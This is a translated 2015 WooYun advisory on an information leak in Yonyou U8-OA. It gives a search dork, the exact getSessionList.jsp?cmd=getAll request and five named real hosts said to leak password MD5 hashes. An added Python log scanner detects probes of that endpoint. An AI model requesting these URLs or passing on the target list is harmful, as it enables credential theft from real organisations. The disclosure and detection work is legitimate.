
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0156663

Title: Yonyou U8-OA (用友U8-OA) leaks sensitive information

Vendor: 用友软件 (Yonyou Software)

Author: 陆由乙

Submitted: 2015-12-05 23:42

Fixed: 2015-12-07 16:35

Published: 2015-12-07 16:35

Type: Sensitive information disclosure

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-05: Details sent to the vendor, awaiting vendor action
2015-12-07: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

66666666666666

Detailed description:

https://g.jiuminghu.com/#newwindow=1&q=intitle:%E3%80%8A%E7%94%A8%E5%8F%8BU8-OA%E3%80%8B&btnK=+%E6%90%9C%E7%B4%A2
intitle:《用友U8-OA》
Cases:
http://122.227.235.74:4389/yyoa/ext/https/getSessionList.jsp?cmd=getAll



http://www.lygdfyy.com.cn:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll



http://222.175.187.147:8081/yyoa/ext/https/getSessionList.jsp?cmd=getAll



http://222.189.156.67:8089/yyoa/ext/https/getSessionList.jsp?cmd=getAll



http://www.hxgroup.co:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll



All five cases leak password MD5 hashes.

Proof of vulnerability:

Already proven.

Fix:

If the file is not required, just delete it.
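As an added defensive example (not part of the original report), the following Python scans web access logs for requests to the getSessionList.jsp endpoint named above, so an operator can tell whether the session dump was actually served (HTTP 200) and from which client addresses; the log lines are constructed samples in the common/combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint path taken from the report; the only page-specific value used here.
EXPOSED_PATH = "/yyoa/ext/https/getSessionList.jsp"

# Apache/Nginx combined log format (assumed for the constructed sample lines).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def is_session_list_dump(target):
    """True when the request path is getSessionList.jsp with cmd=getAll (case-insensitive)."""
    parts = urlsplit(target)
    if parts.path.lower() != EXPOSED_PATH.lower():
        return False
    cmds = [v.lower() for v in parse_qs(parts.query).get("cmd", [])]
    return "getall" in cmds

def find_session_dumps(lines):
    """Return (client_ip, timestamp, status) for every request to the dump endpoint."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_session_list_dump(rec["target"]):
            hits.append((rec["ip"], rec["ts"], rec["status"]))
    return hits

def served_dumps(hits):
    """Keep only hits the server answered with 200: the dump was actually delivered."""
    return [h for h in hits if h[2] == 200]

# Constructed sample log lines (documentation IP ranges, not real clients).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Dec/2015:23:40:01 +0800] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 200 1532',
    '198.51.100.7 - - [05/Dec/2015:23:41:10 +0800] "GET /yyoa/index.jsp HTTP/1.1" 200 8120',
    '203.0.113.5 - - [06/Dec/2015:00:02:44 +0800] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll&x=1 HTTP/1.1" 404 512',
    '192.0.2.9 - - [06/Dec/2015:01:15:00 +0800] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getOne HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, ts, status in served_dumps(find_session_dumps(SAMPLE_LOG)):
        print(f"session list served to {ip} at {ts} (HTTP {status})")
```

A 404 hit after the file has been removed confirms the fix is in place while still recording who probed for it.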

Copyright notice: please credit the source when reposting: 陆由乙@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-12-07 16:35

Vendor reply:

Thank you very much for your interest in Yonyou. This product is no longer part of the Yonyou portfolio; please contact our neighbours at 致远协创, thank you. --> http://www.wooyun.org/corps/%E5%8C%97%E4%BA%AC%E8%87%B4%E8%BF%9C%E5%8D%8F%E5%88%9B%E8%BD%AF%E4%BB%B6%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8

Latest status:

None